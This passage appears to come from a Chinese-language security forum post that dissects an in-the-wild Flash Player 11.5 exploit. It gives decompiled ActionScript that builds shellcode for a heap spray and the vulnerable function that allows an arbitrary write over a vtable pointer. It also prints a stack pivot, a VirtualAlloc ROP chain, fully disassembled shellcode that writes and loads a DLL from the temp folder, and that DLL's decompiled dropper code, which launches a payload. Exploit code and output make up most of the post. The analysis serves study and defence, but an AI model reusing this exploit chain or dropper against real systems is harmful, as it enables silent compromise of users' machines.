                _loc_17.writeUnsignedInt(0x55fc9090);
                _loc_17.writeUnsignedInt(0xf0e48348);
                _loc_17.writeUnsignedInt(0x65d23348);
                _loc_17.writeUnsignedInt(0x60528b48);
                _loc_17.writeUnsignedInt(0x18528b48);
                _loc_17.writeUnsignedInt(0x20528b48);
                _loc_17.writeUnsignedInt(0x50728b48);
                _loc_17.writeUnsignedInt(0x4ab70f48);
                _loc_17.writeUnsignedInt(0xc9334d4a);
                _loc_17.writeUnsignedInt(0xacc03348);
                _loc_17.writeUnsignedInt(0x27c613c);
                _loc_17.writeUnsignedInt(0xc141202c);
                _loc_17.writeUnsignedInt(0x3440dc9);
                _loc_17.writeUnsignedInt(0x52ede2c8);
                _loc_17.writeUnsignedInt(0xba495141);
                _loc_17.writeUnsignedInt(0x92af16da);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x75ca3b4d);
                _loc_17.writeUnsignedInt(0x528b4845);
                _loc_17.writeUnsignedInt(0x3c428b20);
                _loc_17.writeUnsignedInt(0x8bc20348);
                _loc_17.writeUnsignedInt(0x8880);
                _loc_17.writeUnsignedInt(0xc0854800);
                _loc_17.writeUnsignedInt(0x81483074);
                _loc_17.writeUnsignedInt(0x180ec);
                _loc_17.writeUnsignedInt(0xfc8b4800);
                _loc_17.writeUnsignedInt(0x80ec8148);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x8b50c203);
                _loc_17.writeUnsignedInt(0x8b441848);
                _loc_17.writeUnsignedInt(0x34c2040);
                _loc_17.writeUnsignedInt(0x4c8948c2);
                _loc_17.writeUnsignedInt(0x894c1824);
                _loc_17.writeUnsignedInt(0x48202444);
                _loc_17.writeUnsignedInt(0x28244489);
                _loc_17.writeUnsignedInt(0x594108eb);
                _loc_17.writeUnsignedInt(0x128b485a);
                _loc_17.writeUnsignedInt(0x415182eb);
                _loc_17.writeUnsignedInt(0xdaba4950);
                _loc_17.writeUnsignedInt(0x14fdaf6);
                _loc_17.writeUnsignedInt(0xe8000000);
                _loc_17.writeUnsignedInt(315);
                _loc_17.writeUnsignedInt(0x49078948);
                _loc_17.writeUnsignedInt(0xae572dba);
                _loc_17.writeUnsignedInt(347);
                _loc_17.writeUnsignedInt(0x129e800);
                _loc_17.writeUnsignedInt(0x89480000);
                _loc_17.writeUnsignedInt(0xba490847);
                _loc_17.writeUnsignedInt(0x528796c6);
                _loc_17.writeUnsignedInt(1);
                _loc_17.writeUnsignedInt(0x116e8);
                _loc_17.writeUnsignedInt(0x47894800);
                _loc_17.writeUnsignedInt(0x4cba4910);
                _loc_17.writeUnsignedInt(0x1072677);
                _loc_17.writeUnsignedInt(0xe8000000);
                _loc_17.writeUnsignedInt(259);
                _loc_17.writeUnsignedInt(0x18478948);
                _loc_17.writeUnsignedInt(0xf330ba49);
                _loc_17.writeUnsignedInt(0xe449);
                _loc_17.writeUnsignedInt(0xf0e80000);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x48204789);
                _loc_17.writeUnsignedInt(0x8d48f78b);
                _loc_17.writeUnsignedInt(0x80be);
                _loc_17.writeUnsignedInt(0x40b900);
                _loc_17.writeUnsignedInt(0x33480000);
                _loc_17.writeUnsignedInt(0xb9abf3c0);
                _loc_17.writeUnsignedInt(256);
                _loc_17.writeUnsignedInt(0x80868d48);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x8b48d08b);
                _loc_17.writeUnsignedInt(0x568b4cd8);
                _loc_17.writeUnsignedInt(0xd2ff4120);
                _loc_17.writeUnsignedInt(0x80868d48);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0x3348c933);
                _loc_17.writeUnsignedInt(0x30c8adb);
                _loc_17.writeUnsignedInt(0x80c3ff48);
                _loc_17.writeUnsignedInt(0xf57500f9);
                _loc_17.writeUnsignedInt(0xc7cbff48);
                _loc_17.writeUnsignedInt(0x6f630304);
                _loc_17.writeUnsignedInt(0x44c7666e);
                _loc_17.writeUnsignedInt(0x67690403);
                _loc_17.writeUnsignedInt(0x44c7642e);
                _loc_17.writeUnsignedInt(0x6c6c0803);
                _loc_17.writeUnsignedInt(0x33450000);
                _loc_17.writeUnsignedInt(0x44c748c9);
                _loc_17.writeUnsignedInt(0x3024);
                _loc_17.writeUnsignedInt(0x8d480000);
                _loc_17.writeUnsignedInt(0x808e);
                _loc_17.writeUnsignedInt(0x2b84100);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0xc2c7);
                _loc_17.writeUnsignedInt(0x44c74000);
                _loc_17.writeUnsignedInt(0x802824);
                _loc_17.writeUnsignedInt(0x44c70000);
                _loc_17.writeUnsignedInt(0x22024);
                _loc_17.writeUnsignedInt(0x8b4c0000);
                _loc_17.writeUnsignedInt(0xd2ff4116);
                _loc_17.writeUnsignedInt(0x48d88b48);
                _loc_17.writeUnsignedInt(0xffff883);
                _loc_17.writeUnsignedInt(0x9c84);
                _loc_17.writeUnsignedInt(0x4c8d4c00);
                _loc_17.writeUnsignedInt(0xba484024);
                _loc_17.writeUnsignedInt(_loc_12 + 900);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(0xb8419090);
                _loc_17.writeUnsignedInt(_loc_35.length);
                _loc_17.writeUnsignedInt(0x48cb8b48);
                _loc_17.writeUnsignedInt(0x202444c7);
                _loc_17.writeUnsignedInt(0);
                _loc_17.writeUnsignedInt(0x8568b4c);
                _loc_17.writeUnsignedInt(0x48d2ff41);
                _loc_17.writeUnsignedInt(0x7400f883);
                _loc_17.writeUnsignedInt(0xcb8b486c);
                _loc_17.writeUnsignedInt(0x10568b4c);
                _loc_17.writeUnsignedInt(0x48d2ff41);
                _loc_17.writeUnsignedInt(0x808e8d);
                _loc_17.writeUnsignedInt(0x8b4c0000);
                _loc_17.writeUnsignedInt(0xff411856);
                _loc_17.writeUnsignedInt(0x4852ebd2);
                _loc_17.writeUnsignedInt(0x10244c8b);
                _loc_17.writeUnsignedInt(0x24448b4c);
                _loc_17.writeUnsignedInt(0xc9ff4808);
                _loc_17.writeUnsignedInt(0x88348b41);
                _loc_17.writeUnsignedInt(0x4df20348);
                _loc_17.writeUnsignedInt(0x3348c933);
                _loc_17.writeUnsignedInt(0xc141acc0);
                _loc_17.writeUnsignedInt(0x3440dc9);
                _loc_17.writeUnsignedInt(0x75c43ac8);
                _loc_17.writeUnsignedInt(0xc18149f1);
                _loc_17.writeUnsignedInt(0x92af16da);
                _loc_17.writeUnsignedInt(0x75ca3b45);
                _loc_17.writeUnsignedInt(0x448b48d8);
                _loc_17.writeUnsignedInt(0x8b444024);
                _loc_17.writeUnsignedInt(0x34c2440);
                _loc_17.writeUnsignedInt(0x8b4166c2);
                _loc_17.writeUnsignedInt(0x8b44480c);
                _loc_17.writeUnsignedInt(0x34c1c40);
                _loc_17.writeUnsignedInt(0x48b41c2);
                _loc_17.writeUnsignedInt(0xc2034888);
                _loc_17.writeUnsignedInt(0xb94990c3);
                _loc_17.writeUnsignedInt(_loc_10);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(0x1001c741);
                _loc_17.writeUnsignedInt(0x4d000000);
                _loc_17.writeUnsignedInt(0xff70818d);
                _loc_17.writeUnsignedInt(0x8b49ffff);
                _loc_17.writeUnsignedInt(0x894901);
                _loc_17.writeUnsignedInt(0x8418b49);
                _loc_17.writeUnsignedInt(0x8408949);
                _loc_17.writeUnsignedInt(0xb9499090);
                _loc_17.writeUnsignedInt(_loc_11);
                _loc_17.writeUnsignedInt(_loc_31);
                _loc_17.writeUnsignedInt(0xb8419090);
                _loc_17.writeUnsignedInt(_loc_16);
                _loc_17.writeUnsignedInt(0x41018945);
                _loc_17.writeUnsignedInt(0x441c7);
                _loc_17.writeUnsignedInt(0x48000000);
                _loc_17.writeUnsignedInt(0xc3a8658d);
                _loc_17.writeUnsignedInt(0x90909090);
                _loc_15 = (_loc_11 - _loc_10 - 16) / 8;
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[_loc_15] = this.UintToDouble(_loc_12, _loc_31);
                new Number(_loc_6.toString());
                return;
            }
            while (1)
            {
                
            }
            return;
        }// end function

        public function randRange(param1:Number, param2:Number) : Number
        {
            var _loc_3:* = Math.floor(Math.random() * (param2 - param1 + 1)) + param1;
            return _loc_3;
        }// end function

        public function empty() : void
        {
            var _loc_1:* = new TextField();
            _loc_1.autoSize = TextFieldAutoSize.LEFT;
            var _loc_2:* = new TextFormat();
            _loc_2.size = 30;
            _loc_2.font = "Arial";
            _loc_2.color = 0xff0000;
            _loc_1.setTextFormat(_loc_2);
            _loc_1.text = "      ";
            addChild(_loc_1);
            return;
        }// end function

        public function UintToDouble(param1:uint, param2:uint) : Number
        {
            var _loc_3:* = new ByteArray();
            _loc_3.endian = Endian.LITTLE_ENDIAN;
            _loc_3.writeInt(param1);
            _loc_3.writeInt(param2);
            _loc_3.position = 0;
            return _loc_3.readDouble();
        }// end function

        public function ReadDouble(param1:Vector.<Number>, param2:uint) : Vector.<uint>
        {
            new Vector.<uint>(2)[0] = 0;
            new Vector.<uint>(2)[1] = 0;
            var _loc_3:* = new Vector.<uint>(2);
            var _loc_4:* = param1[param2];
            var _loc_5:* = new ByteArray();
            new ByteArray().position = 0;
            _loc_5.writeDouble(_loc_4);
            _loc_3[1] = _loc_5[0] * 0x1000000 + _loc_5[1] * 0x10000 + _loc_5[2] * 256 + _loc_5[3];
            _loc_3[0] = _loc_5[4] * 0x1000000 + _loc_5[5] * 0x10000 + _loc_5[6] * 256 + _loc_5[7];
            return _loc_3;
        }// end function

    }
}

其中充斥大量硬编码、地址计算和堆喷射,详细分析见5楼Paper
Flash32_11_5_502_146.ocx中sub_1054EA10存在溢出:
unsigned int __thiscall sub_1054EA10(void *this, unsigned int a2, int a3)
{
  void *v3; // esi@1
  int v4; // ecx@1
  int v5; // ebx@1
  unsigned int result; // eax@4
  unsigned int v7; // esi@6
  int v8; // eax@9
  double v9; // [sp+Ch] [bp-8h]@1

  v3 = this;
  v9 = sub_10505BD0(a3);
  v4 = *((_DWORD *)v3 + 6);
  v5 = (int)((char *)v3 + 24);
  if ( a2 >= *(_DWORD *)v4 && a2 >= *(_DWORD *)v4 - (unsigned int)*((_BYTE *)v3 + 20) + 1 )
    sub_1054D2D0(v3, a2);
  result = *(_DWORD *)v5;
  if ( a2 >= **(_DWORD **)v5 )
  {
    if ( a2 <= 0xFFFFFFFE )
      v7 = a2 + 1;
    else
      v7 = -1;
    if ( result & 0xFFF )
      v8 = *(_WORD *)((result & 0xFFFFF000) + 0x12);
    else
      v8 = sub_104A2BE0(*(_DWORD *)v5);
    if ( v7 > (unsigned int)(v8 - 8) >> 3 )
      sub_1051DDD0(v5, v7);
    result = sub_1051B170(a2 + 1);
  }
  *(_QWORD *)(*(_DWORD *)v5 + 8 * a2 + 8) = *(_QWORD *)&v9; // a2和v9可控导致任意地址QWORD写从而覆盖某对象的虚函数表指针
  return result;
}

测试环境中Flash32_11_5_502_146.ocx基地址是0x07BD0000
漏洞导致此处ecx的虚函数表指针被覆盖:
08125540    8B01            mov     eax, dword ptr [ecx]              ; eax = 0x06944000
08125542    8B50 70         mov     edx, dword ptr [eax+70]           ; edx = 0x084CDC60
08125545    FFD2            call    edx

Flash32_11_5_502_146.ocx中0x084CDC60:
084CDC60    94              xchg    eax, esp                          ; stackpivot

ROP Chain:
06944000  7C809AE1  kernel32.VirtualAlloc
06944004  06944088  /CALL to VirtualAlloc
06944008  06944000  |Address = 06944000
0694400C  00002000  |Size = 2000 (8192.)
06944010  00001000  |AllocationType = MEM_COMMIT
06944014  00000040  \Protect = PAGE_EXECUTE_READWRITE

shellcode:
06944088    90              nop
06944089    60              pushad
0694408A    83EC 70         sub     esp, 70
0694408D    33DB            xor     ebx, ebx
0694408F    64:8B5B 18      mov     ebx, dword ptr fs:[ebx+18]
06944093    8B5B 30         mov     ebx, dword ptr [ebx+30]
06944096    8B5B 0C         mov     ebx, dword ptr [ebx+C]
06944099    8B5B 1C         mov     ebx, dword ptr [ebx+1C]
0694409C    8B53 08         mov     edx, dword ptr [ebx+8]
0694409F    8B7A 3C         mov     edi, dword ptr [edx+3C]
069440A2    8B7C3A 2C       mov     edi, dword ptr [edx+edi+2C]
069440A6    8DBC3A 00E00000 lea     edi, dword ptr [edx+edi+E000]
069440AD    B8 8B4030C3     mov     eax, C330408B
069440B2    3907            cmp     dword ptr [edi], eax
069440B4    74 03           je      short 069440B9
069440B6    47              inc     edi
069440B7  ^ EB F9           jmp     short 069440B2
069440B9    8BEF            mov     ebp, edi
069440BB    68 65006C00     push    6C0065
069440C0    68 72006E00     push    6E0072
069440C5    68 6B006500     push    65006B
069440CA    FC              cld
069440CB    33C9            xor     ecx, ecx
069440CD    8B1B            mov     ebx, dword ptr [ebx]
069440CF    8BF4            mov     esi, esp
069440D1    8B7B 20         mov     edi, dword ptr [ebx+20]
069440D4    B1 03           mov     cl, 3
069440D6    F3:A7           repe    cmps dword ptr es:[edi], dword ptr [esi]
069440D8  ^ 75 F3           jnz     short 069440CD
069440DA    8B5B 08         mov     ebx, dword ptr [ebx+8]
069440DD    8B53 3C         mov     edx, dword ptr [ebx+3C]
069440E0    8B541A 78       mov     edx, dword ptr [edx+ebx+78]
069440E4    8D441A EC       lea     eax, dword ptr [edx+ebx-14]
069440E8    FFD5            call    ebp
069440EA    8B541A 20       mov     edx, dword ptr [edx+ebx+20]
069440EE    03D3            add     edx, ebx
069440F0    03C3            add     eax, ebx
069440F2    33C9            xor     ecx, ecx
069440F4    E8 10000000     call    06944109
069440F9    53              push    ebx
069440FA    65:74 54        je      short 06944151
069440FD    68 72656164     push    64616572
06944102    43              inc     ebx
06944103    6F              outs    dx, dword ptr es:[edi]
06944104    6E              outs    dx, byte ptr es:[edi]
06944105    74 65           je      short 0694416C
06944107    78 74           js      short 0694417D
06944109    8B3424          mov     esi, dword ptr [esp]
0694410C    8B3A            mov     edi, dword ptr [edx]
0694410E    03FB            add     edi, ebx
06944110    B1 04           mov     cl, 4
06944112    F3:A7           repe    cmps dword ptr es:[edi], dword ptr [esi]
06944114    74 08           je      short 0694411E
06944116    83C2 04         add     edx, 4
06944119    83C0 04         add     eax, 4
0694411C  ^ EB EB           jmp     short 06944109
0694411E    8B10            mov     edx, dword ptr [eax]
06944120    03D3            add     edx, ebx
06944122    33C0            xor     eax, eax
06944124    8BC8            mov     ecx, eax
06944126    B1 20           mov     cl, 20
06944128    8BFC            mov     edi, esp
0694412A    F3:AB           rep     stos dword ptr es:[edi]
0694412C    C70424 10000100 mov     dword ptr [esp], 10010
06944133    54              push    esp                               ; pContext = { ContextFlags = CONTEXT_DEBUG_REGISTERS, Drx = 0 }
06944134    6A FE           push    -2
06944136    FFD2            call    edx                               ; SetThreadContext(0xFFFFFFFE, pContext)
06944138    90              nop
06944139    90              nop
0694413A    90              nop
0694413B    90              nop
0694413C    90              nop
0694413D    90              nop
0694413E    90              nop
0694413F    90              nop
06944140    90              nop
06944141    90              nop
06944142    90              nop
06944143    90              nop
06944144    90              nop
06944145    90              nop
06944146    90              nop
06944147    90              nop
06944148    60              pushad
06944149    81EC 20010000   sub     esp, 120
0694414F    8BFC            mov     edi, esp
06944151    C747 5C 1443940>mov     dword ptr [edi+5C], 6944314
06944158    90              nop
06944159    C747 58 00C6030>mov     dword ptr [edi+58], 3C600
06944160    C707 3274910C   mov     dword ptr [edi], 0C917432
06944166    C747 04 8E130AA>mov     dword ptr [edi+4], AC0A138E
0694416D    C747 08 39E27D8>mov     dword ptr [edi+8], 837DE239
06944174    C747 0C 8FF2186>mov     dword ptr [edi+C], 6118F28F
0694417B    C747 10 9332E49>mov     dword ptr [edi+10], 94E43293
06944182    C747 14 50D59BC>mov     dword ptr [edi+14], CB9BD550
06944189    C747 18 43BEACD>mov     dword ptr [edi+18], DBACBE43
06944190    C747 1C B2360F1>mov     dword ptr [edi+1C], 130F36B2
06944197    C747 20 C48D1F7>mov     dword ptr [edi+20], 741F8DC4
0694419E    C747 24 512FA20>mov     dword ptr [edi+24], 1A22F51
069441A5    C747 28 57660DF>mov     dword ptr [edi+28], FF0D6657
069441AC    C747 2C 9B878BE>mov     dword ptr [edi+2C], E58B879B
069441B3    C747 30 EDAFFFB>mov     dword ptr [edi+30], B4FFAFED
069441BA    C747 34 C2194B0>mov     dword ptr [edi+34], 14B19C2
069441C1    C747 38 7DF0A59>mov     dword ptr [edi+38], 9AA5F07D
069441C8    C747 3C E42B94C>mov     dword ptr [edi+3C], C5942BE4
069441CF    C747 40 EC9D5FA>mov     dword ptr [edi+40], A45F9DEC
069441D6    C747 44 CC77338>mov     dword ptr [edi+44], 8F3377CC
069441DD    E9 27010000     jmp     06944309
069441E2    33C0            xor     eax, eax
069441E4    64:A1 30000000  mov     eax, dword ptr fs:[30]
069441EA    8B40 0C         mov     eax, dword ptr [eax+C]
069441ED    8B40 14         mov     eax, dword ptr [eax+14]
069441F0    8B00            mov     eax, dword ptr [eax]
069441F2    8B00            mov     eax, dword ptr [eax]
069441F4    8B40 10         mov     eax, dword ptr [eax+10]
069441F7    8BE8            mov     ebp, eax
069441F9    8BF7            mov     esi, edi
069441FB    6A 11           push    11
069441FD    59              pop     ecx
069441FE    E8 C1000000     call    069442C4
06944203  ^ E2 F9           loopd   short 069441FE
06944205    8BEE            mov     ebp, esi
06944207    81EC 00040000   sub     esp, 400
0694420D    33C0            xor     eax, eax
0694420F    8945 30         mov     dword ptr [ebp+30], eax
06944212    8B7D 5C         mov     edi, dword ptr [ebp+5C]
06944215    54              push    esp
06944216    5F              pop     edi
06944217    81EC 00020000   sub     esp, 200
0694421D    57              push    edi
0694421E    68 00010000     push    100
06944223    FF55 08         call    dword ptr [ebp+8]                 ; GetTempPathA
06944226    33C0            xor     eax, eax
06944228    40              inc     eax
06944229    803C07 00       cmp     byte ptr [edi+eax], 0
0694422D  ^ 75 F9           jnz     short 06944228
0694422F    8945 60         mov     dword ptr [ebp+60], eax
06944232    C70407 6162632E mov     dword ptr [edi+eax], 2E636261
06944239    C74407 04 63666>mov     dword ptr [edi+eax+4], 676663
06944241    6A 00           push    0
06944243    6A 00           push    0
06944245    6A 02           push    2
06944247    6A 00           push    0
06944249    6A 00           push    0
0694424B    68 00000040     push    40000000
06944250    57              push    edi
06944251    8B45 10         mov     eax, dword ptr [ebp+10]
06944254    E8 49000000     call    069442A2
06944259    83F8 00         cmp     eax, 0
0694425C    7E 32           jle     short 06944290
0694425E    8945 34         mov     dword ptr [ebp+34], eax
06944261    C745 40 0000000>mov     dword ptr [ebp+40], 0
06944268    6A 00           push    0
0694426A    8D45 44         lea     eax, dword ptr [ebp+44]
0694426D    50              push    eax
0694426E    FF75 58         push    dword ptr [ebp+58]
06944271    FF75 5C         push    dword ptr [ebp+5C]
06944274    FF75 34         push    dword ptr [ebp+34]
06944277    FF55 20         call    dword ptr [ebp+20]                ; WriteFile
0694427A    FF75 34         push    dword ptr [ebp+34]                ; CloseHandle
0694427D    FF55 28         call    dword ptr [ebp+28]
06944280    57              push    edi
06944281    C745 20 6309784>mov     dword ptr [ebp+20], 41780963
06944288    8B45 00         mov     eax, dword ptr [ebp]
0694428B    E8 12000000     call    069442A2
06944290    81C4 C4070000   add     esp, 7C4
06944296    61              popad
06944297    8D65 D4         lea     esp, dword ptr [ebp-2C]           ; stackpivot
0694429A    C3              retn
0694429B    6A FF           push    -1
0694429D    6A FF           push    -1
0694429F    FF55 0C         call    dword ptr [ebp+C]
069442A2    8038 E8         cmp     byte ptr [eax], 0E8
069442A5    74 0A           je      short 069442B1
069442A7    8038 E9         cmp     byte ptr [eax], 0E9
069442AA    74 05           je      short 069442B1
069442AC    8038 EB         cmp     byte ptr [eax], 0EB
069442AF    75 11           jnz     short 069442C2
069442B1    8178 05 9090909>cmp     dword ptr [eax+5], 90909090
069442B8    74 08           je      short 069442C2
069442BA    8BFF            mov     edi, edi
069442BC    55              push    ebp
069442BD    8BEC            mov     ebp, esp
069442BF    8D40 05         lea     eax, dword ptr [eax+5]
069442C2    FFE0            jmp     eax                               ; CreateFileA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL) => LoadLibraryA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg")
069442C4    51              push    ecx
069442C5    56              push    esi
069442C6    8B75 3C         mov     esi, dword ptr [ebp+3C]
069442C9    8B742E 78       mov     esi, dword ptr [esi+ebp+78]
069442CD    03F5            add     esi, ebp
069442CF    56              push    esi
069442D0    8B76 20         mov     esi, dword ptr [esi+20]
069442D3    03F5            add     esi, ebp
069442D5    33C9            xor     ecx, ecx
069442D7    49              dec     ecx
069442D8    41              inc     ecx
069442D9    AD              lods    dword ptr [esi]
069442DA    03C5            add     eax, ebp
069442DC    33DB            xor     ebx, ebx
069442DE    0FBE10          movsx   edx, byte ptr [eax]
069442E1    3AD6            cmp     dl, dh
069442E3    74 08           je      short 069442ED
069442E5    C1CB 07         ror     ebx, 7
069442E8    03DA            add     ebx, edx
069442EA    40              inc     eax
069442EB  ^ EB F1           jmp     short 069442DE
069442ED    3B1F            cmp     ebx, dword ptr [edi]
069442EF  ^ 75 E7           jnz     short 069442D8
069442F1    5E              pop     esi
069442F2    8B5E 24         mov     ebx, dword ptr [esi+24]
069442F5    03DD            add     ebx, ebp
069442F7    66:8B0C4B       mov     cx, word ptr [ebx+ecx*2]
069442FB    8B5E 1C         mov     ebx, dword ptr [esi+1C]
069442FE    03DD            add     ebx, ebp
06944300    8B048B          mov     eax, dword ptr [ebx+ecx*4]
06944303    03C5            add     eax, ebp
06944305    AB              stos    dword ptr es:[edi]
06944306    5E              pop     esi
06944307    59              pop     ecx
06944308    C3              retn
06944309    E8 D4FEFFFF     call    069441E2

注意shellcode利用stackpivot恢复了堆栈回到了正常的执行流避免了崩溃
abc.cfg:
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  char *p1; // eax@2
  char c1; // cl@3
  DWORD d1; // edx@4
  DWORD d2; // ecx@4
  HANDLE hFile; // esi@4
  HANDLE hHeap1; // eax@4
  void *lpAddress; // edi@4
  HANDLE hHeap2; // eax@4
  CHAR *lpBuffer; // esi@4
  CHAR *p2; // eax@4
  CHAR c2; // cl@5
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+0h] [bp-164h]@1
  DWORD NumberOfBytesWritten; // [sp+10h] [bp-154h]@4
  DWORD flOldProtect; // [sp+14h] [bp-150h]@4
  struct _STARTUPINFOA StartupInfo; // [sp+18h] [bp-14Ch]@2
  char lpFileName[260]; // [sp+5Ch] [bp-108h]@2
  unsigned int v20; // [sp+160h] [bp-4h]@1

  v20 = (unsigned int)&ProcessInformation ^ __security_cookie;
  if ( fdwReason == DLL_PROCESS_ATTACH )
  {
    GetTempPathA(0x104u, lpFileName);
    p1 = (char *)&StartupInfo.hStdError + 3;
    do
      c1 = (p1++)[1];
    while ( c1 );
    d1 = dword_1000927C;                        // 'etne'
    *(_DWORD *)p1 = dword_10009278;             // 'cces'
    d2 = dword_10009280;                        // 'xx.r'
    *((_DWORD *)p1 + 1) = d1;
    LOWORD(d1) = word_10009284;                 // 'x'
    *((_DWORD *)p1 + 2) = d2;
    *((_WORD *)p1 + 6) = d1;
    hFile = CreateFileA(lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    WriteFile(hFile, &unk_1000AC50, 0x157D0u, &NumberOfBytesWritten, 0);
    CloseHandle(hFile);
    hHeap1 = GetProcessHeap();
    lpAddress = HeapAlloc(hHeap1, HEAP_ZERO_MEMORY, 0x1000u);
    VirtualProtect(lpAddress, 0x1000u, PAGE_EXECUTE_READWRITE, &flOldProtect);
    hHeap2 = GetProcessHeap();
    lpBuffer = (CHAR *)HeapAlloc(hHeap2, HEAP_ZERO_MEMORY, 0x100u);
    GetTempPathA(0x100u, lpBuffer);
    p2 = lpBuffer - 1;
    do
      c2 = (p2++)[1];
    while ( c2 );
    *(_DWORD *)p2 = dword_10009278;             // 'cces'
    *((_DWORD *)p2 + 1) = dword_1000927C;       // 'etne'
    *((_DWORD *)p2 + 2) = dword_10009280;       // 'xx.r'
    *((_WORD *)p2 + 6) = word_10009284;         // 'x'
    memset(lpAddress, 0x90u, 0x1000u);
    memset(&StartupInfo, 0, 0x44u);
    StartupInfo.cb = 0x44u;
    StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
    ProcessInformation.hProcess = 0;
    ProcessInformation.hThread = 0;
    ProcessInformation.dwProcessId = 0;
    ProcessInformation.dwThreadId = 0;
    CreateProcessA(lpBuffer, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
  }
  return 1;
}

几经周折终于drop了seccetnter.xxx这个payload
Paper中漏洞原理简单掠过了,最后补上,thanks to cscoder
另外附件就是POC不要搞错了
void *__cdecl sub_10529FB0(LPSTR szRegExp, int a2, int a3, int a4, int a5, int a6)
{
  int v6; // ebx@1
  LPSTR v7; // ebp@1
  int v8; // esi@1
  int v10; // eax@8
  int v11; // eax@9
  signed int v12; // eax@11
  int v13; // ebx@16
  unsigned int v14; // eax@21
  int v15; // eax@31
  int v16; // eax@31
  int v17; // esi@33
  signed int v18; // eax@36
  CHAR *v19; // edi@48
  int v20; // eax@49
  void *v21; // ecx@53
  int v22; // esi@53
  void *v23; // eax@53
  void *v24; // ebp@53
  int v25; // ebx@55
  int v26; // ebx@55
  int v27; // ST04_4@55
  char v28; // ST00_1@55
  int v29; // eax@62
  int v30; // eax@66
  int v31; // esi@67
  int v32; // eax@81
  __int16 v33; // ax@89
  int v34; // edx@90
  int a3a; // [sp+10h] [bp-884h]@1
  int a5a; // [sp+14h] [bp-880h]@1
  LPSTR v37; // [sp+18h] [bp-87Ch]@1
  int a13; // [sp+1Ch] [bp-878h]@1
  LPSTR v39; // [sp+20h] [bp-874h]@1
  int a10; // [sp+24h] [bp-870h]@48
  int a9; // [sp+28h] [bp-86Ch]@48
  int v42; // [sp+2Ch] [bp-868h]@1
  int v43; // [sp+30h] [bp-864h]@1
  int v44; // [sp+34h] [bp-860h]@1
  int a12; // [sp+38h] [bp-85Ch]@18
  int v46; // [sp+3Ch] [bp-858h]@18
  int v47; // [sp+40h] [bp-854h]@18
  int v48; // [sp+44h] [bp-850h]@18
  char *v49; // [sp+48h] [bp-84Ch]@48
  char *v50; // [sp+4Ch] [bp-848h]@48
  LPSTR v51; // [sp+50h] [bp-844h]@48
  CHAR *v52; // [sp+54h] [bp-840h]@48
  unsigned int v53; // [sp+58h] [bp-83Ch]@48
  int v54; // [sp+5Ch] [bp-838h]@48
  int v55; // [sp+60h] [bp-834h]@48
  int v56; // [sp+64h] [bp-830h]@48
  int v57; // [sp+68h] [bp-82Ch]@48
  int v58; // [sp+6Ch] [bp-828h]@48
  int v59; // [sp+70h] [bp-824h]@48
  int v60; // [sp+74h] [bp-820h]@48
  int v61; // [sp+78h] [bp-81Ch]@48
  int v62; // [sp+7Ch] [bp-818h]@48
  int v63; // [sp+80h] [bp-814h]@55
  int v64; // [sp+84h] [bp-810h]@37
  int v65; // [sp+88h] [bp-80Ch]@38
  char v66; // [sp+8Ch] [bp-808h]@38
  char v67; // [sp+8Dh] [bp-807h]@38
  unsigned __int8 v68; // [sp+90h] [bp-804h]@48
  unsigned int v69; // [sp+890h] [bp-4h]@1

  v69 = (unsigned int)&a3a ^ __security_cookie;
  v6 = a4;
  v7 = szRegExp;
  v8 = a3;
  v39 = szRegExp;
  v42 = a3;
  v43 = a4;
  v44 = a5;
  a13 = 1;
  a5a = 0;
  a3a = 0;
  v37 = szRegExp;
  if ( !a4 )
  {
    if ( a3 )
      *(_DWORD *)a3 = 0x63u;
    return 0;
  }
  *(_DWORD *)a4 = 0;
  if ( a3 )
    *(_DWORD *)a3 = 0;
  if ( !a5 )
  {
    v10 = 0x10u;
LABEL_75:
    *(_DWORD *)v6 = *(_DWORD *)&off_10D07D70[4 * v10];
    if ( v8 )
      *(_DWORD *)v8 = v10;
    return 0;
  }
  *(_DWORD *)a5 = 0;
  v11 = a2;
  if ( a2 & 0x800 && !(a2 & 0x2000) )
  {
    v12 = sub_1057F290(szRegExp, -1);
    *(_DWORD *)a5 = v12;
    if ( v12 >= 0 )
    {
      v10 = 0x2Cu;
      goto LABEL_75;
    }
    v11 = a2;
  }
  if ( v11 & 0xFF838580 )
  {
    v10 = 0x11u;
LABEL_74:
    v8 = v42;
    v6 = v43;
    *(_DWORD *)v44 = v37 - v7;
    goto LABEL_75;
  }
  v13 = a6;
  if ( !a6 )
    v13 = (int)&unk_10B3EEC8;
  a12 = v13;
  v46 = v13 + 0x100;
  v47 = v13 + 0x200;
  v48 = v13 + 0x340;
  if ( *szRegExp == '(' && szRegExp[1] == '*' )
  {
    if ( strncmp(szRegExp + 2, "CR)", 3u) )
    {
      if ( strncmp(szRegExp + 2, "LF)", 3u) )
      {
        if ( strncmp(szRegExp + 2, "CRLF)", 5u) )
        {
          if ( strncmp(szRegExp + 2, "ANY)", 4u) )
          {
            if ( strncmp(szRegExp + 2, "ANYCRLF)", 8u) )
              goto LABEL_31;
            a3a = 10;
            v14 = 0x500000u;
          }
          else
          {
            a3a = 6;
            v14 = 0x400000u;
          }
        }
        else
        {
          a3a = 7;
          v14 = 0x300000u;
        }
      }
      else
      {
        a3a = 5;
        v14 = 0x200000u;
      }
    }
    else
    {
      a3a = 5;
      v14 = 0x100000u;
    }
    a2 = v14 | a2 & 0xFF8FFFFF;
